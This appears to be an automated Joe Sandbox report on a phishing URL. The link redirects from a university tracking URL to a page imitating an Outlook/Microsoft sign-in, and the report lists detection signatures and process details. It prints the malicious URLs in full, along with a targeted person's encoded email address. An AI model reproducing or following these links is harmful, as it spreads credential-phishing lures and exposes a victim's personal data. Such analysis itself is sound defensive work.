Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
http://cubes.concordia.ca/track?type=click&enid=bWFpbGluZ2lkPTM2MjMmbWVzc2FnZWlkPTQxMjEmZGF0YWJhc2VpZD05MDEmc2VyaWFsPTEyNzU1MDM1NzUmZW1haWxpZD13YXJpZXN0NTkzMzgud2Vla2x5bWFpbEBibG9nZ2VyLmNvbSZ1c2VyaWQ9NDcxJmZsPSZleHRyYT1NdWx0aXZhcmlhdGVJZD0mJiY=&&&2028&&&http://gbmaucstans.com/?ddg5B=ZnJhbmNvaXMuYm91

Overview

General Information

Sample URL:http://cubes.concordia.ca/track?type=click&enid=bWFpbGluZ2lkPTM2MjMmbWVzc2FnZWlkPTQxMjEmZGF0YWJhc2VpZD05MDEmc2VyaWFsPTEyNzU1MDM1NzUmZW1haWxpZD13YXJpZXN0NTkzMzgud2Vla2x5bWFpbEBibG9nZ2VyLmNvbSZ1c2VyaWQ9
Analysis ID:1426704
Infos:

Detection

Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for domain / URL
Phishing site detected (based on favicon image match)
Phishing site detected (based on image similarity)
HTML body contains low number of good links
HTML body contains password input but no form action
HTML page contains hidden URLs or javascript code
HTML title does not match URL
None HTTPS page querying sensitive user data (password, username or email)
Phishing site detected (based on OCR NLP Model)
Stores files to the Windows start menu directory
Uses insecure TLS / SSL version for HTTPS connection

Classification

  • System is w10x64
  • chrome.exe (PID: 6980 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 5528 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2568 --field-trial-handle=2540,i,10552630930107338584,18205451540120361499,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 5856 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://cubes.concordia.ca/track?type=click&enid=bWFpbGluZ2lkPTM2MjMmbWVzc2FnZWlkPTQxMjEmZGF0YWJhc2VpZD05MDEmc2VyaWFsPTEyNzU1MDM1NzUmZW1haWxpZD13YXJpZXN0NTkzMzgud2Vla2x5bWFpbEBibG9nZ2VyLmNvbSZ1c2VyaWQ9NDcxJmZsPSZleHRyYT1NdWx0aXZhcmlhdGVJZD0mJiY=&&&2028&&&http://gbmaucstans.com/?ddg5B=ZnJhbmNvaXMuYm91bGFuZ2VyQGNnaS5jb20=" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Snort rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: http://cubes.concordia.ca/track?type=click&enid=bWFpbGluZ2lkPTM2MjMmbWVzc2FnZWlkPTQxMjEmZGF0YWJhc2VpZD05MDEmc2VyaWFsPTEyNzU1MDM1NzUmZW1haWxpZD13YXJpZXN0NTkzMzgud2Vla2x5bWFpbEBibG9nZ2VyLmNvbSZ1c2VyaWQ9NDcxJmZsPSZleHRyYT1NdWx0aXZhcmlhdGVJZD0mJiY=&&&2028&&&http://gbmaucstans.com/?ddg5B=ZnJhbmNvaXMuYm91bGFuZ2VyQGNnaS5jb20=SlashNext: detection malicious, Label: Credential Stealing type: Phishing & Social Engineering
Source: https://bc1qhefefhkqg4a9rhm372pr0wj.com/api/v3/authVirustotal: Detection: 5%Perma Link

Phishing

barindex
Source: http://gbmaucstans.comMatcher: Template: outlook matched with high similarity
Source: http://gbmaucstans.com/main/main.php#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?cfg=francois.boulanger@cgi.comMatcher: Template: outlook matched with high similarity
Source: http://gbmaucstans.com/main/main.php#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?cfg=francois.boulanger@cgi.comMatcher: Found strong image similarity, brand: MICROSOFT
Source: http://gbmaucstans.com/main/main.php#76BTvXEpvR7qiZVvg2YviuUz8X02NMvVS7Po5uNAlV1EVW9bZ7GhBARJyRMmDihwp6UuAI5WD6Ay3JJ2Qqkr1bbz3YWGgddFk8aVQfRumr2paMs1dNteYFO1DKITYWzi4KeV05pmwsMHfeJs1cH0Rw2ugLofHXxLIMGIR64ozQ6O5Ph71Y8SuanLWL0DJyprk6acceAL5GAbvRjxPrqkCN6yz6biFBK0HVcU9NGfugrZ7KxXcXhOKnmjuyCa9naRinLsarIFH9EPUbM683VTrhcVQP50cgRuDCWO4EtMO8BIknOtrJmS1zOSoUSBaK6On2DrH7dwgOeAc34DNrwP1kHqeA1pk7dHaR9SYmoebCPnGU1ulxjmS1M7CNwWVKE5BNXzalOlYDJFxL9Tisfbu2i6QP3LzIRavOKGay19cLOKwXDPqT0UWj1M84yHMpSieCYoa0xnLl7ijL7JF8EBrFozKWhxl9PzLOYWOvjARrSad0US8yuzeS9ZOqwazmJlaIhZdBA52sgfta8BJCbYukXjLutlQdG0VY09zAfB3vRwGZ8qBko6FmpqQSMG6sH1qIb0iqCmVtTCt124lra0NzrDsdjyG1A7JL72bKo7dhJGjMLFdWG0w7EYlYx1Z79JShL419berVVKIHpVD5W9dA7yyFAyMJhF03J1dVgERcpzTOvwUrG72OGBtgaf0rU1vD3IzjmqwLZpAuWvWCDYqjATAK8Bc3CHHGpg0MGwyGV9bSE7uh6UBGNcqWNDZqkG6KW6xDC6kyfvqUDUcKPNqC0RzNuzdPfjAcq7Q2daAtG1njVA3KounomXbRwpGMJgZ9oPbB0M5GNtZJ33urxSPUP1Lmqs8aJ7j7XuJXhOE5hEOkHjMfbC91EVn5nwf6EydB2XzkLdp3RdozxaOJNYKrT8wgFLmjkAUnytHjH6nykL7RWWAKUlbNuI49ursO1nbARSTyZh7j2fbZbMJ68VTCEXL8o...HTTP Parser: Number of links: 0
Source: http://gbmaucstans.com/main/main.php#76BTvXEpvR7qiZVvg2YviuUz8X02NMvVS7Po5uNAlV1EVW9bZ7GhBARJyRMmDihwp6UuAI5WD6Ay3JJ2Qqkr1bbz3YWGgddFk8aVQfRumr2paMs1dNteYFO1DKITYWzi4KeV05pmwsMHfeJs1cH0Rw2ugLofHXxLIMGIR64ozQ6O5Ph71Y8SuanLWL0DJyprk6acceAL5GAbvRjxPrqkCN6yz6biFBK0HVcU9NGfugrZ7KxXcXhOKnmjuyCa9naRinLsarIFH9EPUbM683VTrhcVQP50cgRuDCWO4EtMO8BIknOtrJmS1zOSoUSBaK6On2DrH7dwgOeAc34DNrwP1kHqeA1pk7dHaR9SYmoebCPnGU1ulxjmS1M7CNwWVKE5BNXzalOlYDJFxL9Tisfbu2i6QP3LzIRavOKGay19cLOKwXDPqT0UWj1M84yHMpSieCYoa0xnLl7ijL7JF8EBrFozKWhxl9PzLOYWOvjARrSad0US8yuzeS9ZOqwazmJlaIhZdBA52sgfta8BJCbYukXjLutlQdG0VY09zAfB3vRwGZ8qBko6FmpqQSMG6sH1qIb0iqCmVtTCt124lra0NzrDsdjyG1A7JL72bKo7dhJGjMLFdWG0w7EYlYx1Z79JShL419berVVKIHpVD5W9dA7yyFAyMJhF03J1dVgERcpzTOvwUrG72OGBtgaf0rU1vD3IzjmqwLZpAuWvWCDYqjATAK8Bc3CHHGpg0MGwyGV9bSE7uh6UBGNcqWNDZqkG6KW6xDC6kyfvqUDUcKPNqC0RzNuzdPfjAcq7Q2daAtG1njVA3KounomXbRwpGMJgZ9oPbB0M5GNtZJ33urxSPUP1Lmqs8aJ7j7XuJXhOE5hEOkHjMfbC91EVn5nwf6EydB2XzkLdp3RdozxaOJNYKrT8wgFLmjkAUnytHjH6nykL7RWWAKUlbNuI49ursO1nbARSTyZh7j2fbZbMJ68VTCEXL8o...HTTP Parser: <input type="password" .../> found but no <form action="...
Source: http://cubes.concordia.ca/track?type=click&enid=bWFpbGluZ2lkPTM2MjMmbWVzc2FnZWlkPTQxMjEmZGF0YWJhc2VpZD05MDEmc2VyaWFsPTEyNzU1MDM1NzUmZW1haWxpZD13YXJpZXN0NTkzMzgud2Vla2x5bWFpbEBibG9nZ2VyLmNvbSZ1c2VyaWQ9NDcxJmZsPSZleHRyYT1NdWx0aXZhcmlhdGVJZD0mJiY=&&&2028&&&http://gbmaucstans.com/?ddg5B=ZnJhbmNvaXMuYm91bGFuZ2VyQGNnaS5jb20=HTTP Parser: Base64 decoded: http://gbmaucstans.com/?ddg5B=ZnJhbmNvaXMuYm91bGFuZ2VyQGNnaS5jb20=
Source: http://gbmaucstans.com/main/main.php#76BTvXEpvR7qiZVvg2YviuUz8X02NMvVS7Po5uNAlV1EVW9bZ7GhBARJyRMmDihwp6UuAI5WD6Ay3JJ2Qqkr1bbz3YWGgddFk8aVQfRumr2paMs1dNteYFO1DKITYWzi4KeV05pmwsMHfeJs1cH0Rw2ugLofHXxLIMGIR64ozQ6O5Ph71Y8SuanLWL0DJyprk6acceAL5GAbvRjxPrqkCN6yz6biFBK0HVcU9NGfugrZ7KxXcXhOKnmjuyCa9naRinLsarIFH9EPUbM683VTrhcVQP50cgRuDCWO4EtMO8BIknOtrJmS1zOSoUSBaK6On2DrH7dwgOeAc34DNrwP1kHqeA1pk7dHaR9SYmoebCPnGU1ulxjmS1M7CNwWVKE5BNXzalOlYDJFxL9Tisfbu2i6QP3LzIRavOKGay19cLOKwXDPqT0UWj1M84yHMpSieCYoa0xnLl7ijL7JF8EBrFozKWhxl9PzLOYWOvjARrSad0US8yuzeS9ZOqwazmJlaIhZdBA52sgfta8BJCbYukXjLutlQdG0VY09zAfB3vRwGZ8qBko6FmpqQSMG6sH1qIb0iqCmVtTCt124lra0NzrDsdjyG1A7JL72bKo7dhJGjMLFdWG0w7EYlYx1Z79JShL419berVVKIHpVD5W9dA7yyFAyMJhF03J1dVgERcpzTOvwUrG72OGBtgaf0rU1vD3IzjmqwLZpAuWvWCDYqjATAK8Bc3CHHGpg0MGwyGV9bSE7uh6UBGNcqWNDZqkG6KW6xDC6kyfvqUDUcKPNqC0RzNuzdPfjAcq7Q2daAtG1njVA3KounomXbRwpGMJgZ9oPbB0M5GNtZJ33urxSPUP1Lmqs8aJ7j7XuJXhOE5hEOkHjMfbC91EVn5nwf6EydB2XzkLdp3RdozxaOJNYKrT8wgFLmjkAUnytHjH6nykL7RWWAKUlbNuI49ursO1nbARSTyZh7j2fbZbMJ68VTCEXL8o...HTTP Parser: Title: Sign In does not match URL
Source: http://gbmaucstans.com/main/main.php#76BTvXEpvR7qiZVvg2YviuUz8X02NMvVS7Po5uNAlV1EVW9bZ7GhBARJyRMmDihwp6UuAI5WD6Ay3JJ2Qqkr1bbz3YWGgddFk8aVQfRumr2paMs1dNteYFO1DKITYWzi4KeV05pmwsMHfeJs1cH0Rw2ugLofHXxLIMGIR64ozQ6O5Ph71Y8SuanLWL0DJyprk6acceAL5GAbvRjxPrqkCN6yz6biFBK0HVcU9NGfugrZ7KxXcXhOKnmjuyCa9naRinLsarIFH9EPUbM683VTrhcVQP50cgRuDCWO4EtMO8BIknOtrJmS1zOSoUSBaK6On2DrH7dwgOeAc34DNrwP1kHqeA1pk7dHaR9SYmoebCPnGU1ulxjmS1M7CNwWVKE5BNXzalOlYDJFxL9Tisfbu2i6QP3LzIRavOKGay19cLOKwXDPqT0UWj1M84yHMpSieCYoa0xnLl7ijL7JF8EBrFozKWhxl9PzLOYWOvjARrSad0US8yuzeS9ZOqwazmJlaIhZdBA52sgfta8BJCbYukXjLutlQdG0VY09zAfB3vRwGZ8qBko6FmpqQSMG6sH1qIb0iqCmVtTCt124lra0NzrDsdjyG1A7JL72bKo7dhJGjMLFdWG0w7EYlYx1Z79JShL419berVVKIHpVD5W9dA7yyFAyMJhF03J1dVgERcpzTOvwUrG72OGBtgaf0rU1vD3IzjmqwLZpAuWvWCDYqjATAK8Bc3CHHGpg0MGwyGV9bSE7uh6UBGNcqWNDZqkG6KW6xDC6kyfvqUDUcKPNqC0RzNuzdPfjAcq7Q2daAtG1njVA3KounomXbRwpGMJgZ9oPbB0M5GNtZJ33urxSPUP1Lmqs8aJ7j7XuJXhOE5hEOkHjMfbC91EVn5nwf6EydB2XzkLdp3RdozxaOJNYKrT8wgFLmjkAUnytHjH6nykL7RWWAKUlbNuI49ursO1nbARSTyZh7j2fbZbMJ68VTCEXL8o...HTTP Parser: Has password / email / username input fields
Source: Chrome DOM: 0.0ML Model on OCR Text: Matched 81.7% probability on "www.office.com Verify you are human by completing the action below. www.office.com needs to review the security of your connection before proceeding. "
Source: http://gbmaucstans.com/main/main.php#76BTvXEpvR7qiZVvg2YviuUz8X02NMvVS7Po5uNAlV1EVW9bZ7GhBARJyRMmDihwp6UuAI5WD6Ay3JJ2Qqkr1bbz3YWGgddFk8aVQfRumr2paMs1dNteYFO1DKITYWzi4KeV05pmwsMHfeJs1cH0Rw2ugLofHXxLIMGIR64ozQ6O5Ph71Y8SuanLWL0DJyprk6acceAL5GAbvRjxPrqkCN6yz6biFBK0HVcU9NGfugrZ7KxXcXhOKnmjuyCa9naRinLsarIFH9EPUbM683VTrhcVQP50cgRuDCWO4EtMO8BIknOtrJmS1zOSoUSBaK6On2DrH7dwgOeAc34DNrwP1kHqeA1pk7dHaR9SYmoebCPnGU1ulxjmS1M7CNwWVKE5BNXzalOlYDJFxL9Tisfbu2i6QP3LzIRavOKGay19cLOKwXDPqT0UWj1M84yHMpSieCYoa0xnLl7ijL7JF8EBrFozKWhxl9PzLOYWOvjARrSad0US8yuzeS9ZOqwazmJlaIhZdBA52sgfta8BJCbYukXjLutlQdG0VY09zAfB3vRwGZ8qBko6FmpqQSMG6sH1qIb0iqCmVtTCt124lra0NzrDsdjyG1A7JL72bKo7dhJGjMLFdWG0w7EYlYx1Z79JShL419berVVKIHpVD5W9dA7yyFAyMJhF03J1dVgERcpzTOvwUrG72OGBtgaf0rU1vD3IzjmqwLZpAuWvWCDYqjATAK8Bc3CHHGpg0MGwyGV9bSE7uh6UBGNcqWNDZqkG6KW6xDC6kyfvqUDUcKPNqC0RzNuzdPfjAcq7Q2daAtG1njVA3KounomXbRwpGMJgZ9oPbB0M5GNtZJ33urxSPUP1Lmqs8aJ7j7XuJXhOE5hEOkHjMfbC91EVn5nwf6EydB2XzkLdp3RdozxaOJNYKrT8wgFLmjkAUnytHjH6nykL7RWWAKUlbNuI49ursO1nbARSTyZh7j2fbZbMJ68VTCEXL8o...HTTP Parser: <input type="password" .../> found
Source: http://cubes.concordia.ca/track?type=click&enid=bWFpbGluZ2lkPTM2MjMmbWVzc2FnZWlkPTQxMjEmZGF0YWJhc2VpZD05MDEmc2VyaWFsPTEyNzU1MDM1NzUmZW1haWxpZD13YXJpZXN0NTkzMzgud2Vla2x5bWFpbEBibG9nZ2VyLmNvbSZ1c2VyaWQ9NDcxJmZsPSZleHRyYT1NdWx0aXZhcmlhdGVJZD0mJiY=&&&2028&&&http://gbmaucstans.com/?ddg5B=ZnJhbmNvaXMuYm91bGFuZ2VyQGNnaS5jb20=HTTP Parser: No favicon
Source: http://gbmaucstans.com/main/HTTP Parser: No favicon
Source: http://gbmaucstans.com/main/HTTP Parser: No favicon
Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/jgoie/0x4AAAAAAAQ_ajLYJ-oSKSIN/auto/normalHTTP Parser: No favicon
Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/jgoie/0x4AAAAAAAQ_ajLYJ-oSKSIN/auto/normalHTTP Parser: No favicon
Source: http://gbmaucstans.com/main/main.php#76BTvXEpvR7qiZVvg2YviuUz8X02NMvVS7Po5uNAlV1EVW9bZ7GhBARJyRMmDihwp6UuAI5WD6Ay3JJ2Qqkr1bbz3YWGgddFk8aVQfRumr2paMs1dNteYFO1DKITYWzi4KeV05pmwsMHfeJs1cH0Rw2ugLofHXxLIMGIR64ozQ6O5Ph71Y8SuanLWL0DJyprk6acceAL5GAbvRjxPrqkCN6yz6biFBK0HVcU9NGfugrZ7KxXcXhOKnmjuyCa9naRinLsarIFH9EPUbM683VTrhcVQP50cgRuDCWO4EtMO8BIknOtrJmS1zOSoUSBaK6On2DrH7dwgOeAc34DNrwP1kHqeA1pk7dHaR9SYmoebCPnGU1ulxjmS1M7CNwWVKE5BNXzalOlYDJFxL9Tisfbu2i6QP3LzIRavOKGay19cLOKwXDPqT0UWj1M84yHMpSieCYoa0xnLl7ijL7JF8EBrFozKWhxl9PzLOYWOvjARrSad0US8yuzeS9ZOqwazmJlaIhZdBA52sgfta8BJCbYukXjLutlQdG0VY09zAfB3vRwGZ8qBko6FmpqQSMG6sH1qIb0iqCmVtTCt124lra0NzrDsdjyG1A7JL72bKo7dhJGjMLFdWG0w7EYlYx1Z79JShL419berVVKIHpVD5W9dA7yyFAyMJhF03J1dVgERcpzTOvwUrG72OGBtgaf0rU1vD3IzjmqwLZpAuWvWCDYqjATAK8Bc3CHHGpg0MGwyGV9bSE7uh6UBGNcqWNDZqkG6KW6xDC6kyfvqUDUcKPNqC0RzNuzdPfjAcq7Q2daAtG1njVA3KounomXbRwpGMJgZ9oPbB0M5GNtZJ33urxSPUP1Lmqs8aJ7j7XuJXhOE5hEOkHjMfbC91EVn5nwf6EydB2XzkLdp3RdozxaOJNYKrT8wgFLmjkAUnytHjH6nykL7RWWAKUlbNuI49ursO1nbARSTyZh7j2fbZbMJ68VTCEXL8o...HTTP Parser: No favicon
